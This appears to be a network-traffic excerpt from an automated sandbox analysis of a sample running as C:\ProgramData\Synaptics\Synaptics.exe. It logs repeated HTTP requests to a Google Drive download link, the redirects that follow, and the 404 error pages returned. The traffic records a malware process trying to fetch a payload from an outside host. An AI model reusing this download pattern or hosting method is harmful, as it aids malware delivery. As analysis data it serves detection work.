                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:30 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:30 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-zDHMQJLld6BccgSVK7A4hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              141192.168.2.750195142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6QEl_x6cIAQiflk3hbBgStAf8LLxgU41mnxKblxDAU4l98nrUDceqF3PQN57n1XrfY7ellHxc
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:30 GMT
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tExtbEtSLne7EBV-kWUA0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 48 55 31 54 32 52 75 4f 5a 46 7a 7a 34 51 62 69 6f 46 49 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="iHU1T2RuOZFzz4QbioFIkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              142192.168.2.750200216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:31 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:31 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YJ5TLxqdhpegOMDHF41T0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              143192.168.2.750203216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:31 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:31 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UE9lud4fkbGVWcmAA9ZItA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              144192.168.2.750202142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:31 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC50cAT_C5SEFhb5c2BOV8g_VoIWnqdgUhN1eYpmH2PO1BW5lkgYGoG4y1Cl29kXSmCf
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:31 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-gCkx3r1EQbHevbXp739iZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:31 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:31 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 73 6b 69 54 53 6f 31 52 56 41 33 50 63 43 57 53 38 6a 62 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="cskiTSo1RVA3PcCWS8jbrQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:31 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              145192.168.2.750205142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4yeL90xrO1Sx9ere9W88D5eUced247ITk2H6g0J1FTW44uyJ6PejgACgBAFCNlgI-Y
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:32 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-qx5I-tlHyvV1h75KmD-97Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 76 46 59 4a 59 66 53 63 48 37 30 76 6c 6c 77 7a 74 37 56 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="4vFYJYfScH70vllwzt7V2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              146192.168.2.750206216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:32 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:32 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0tx6D1utisEurH7BkWjj3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              147192.168.2.750208142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6ThkGaDbigguh77pL1LF71tnN2N2r2UpCgt0yGwPYpM-_U7iEUHeAkLgTEYAKfcRyd
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:32 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-_Q6RJdQsF50F5w4GRSROvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
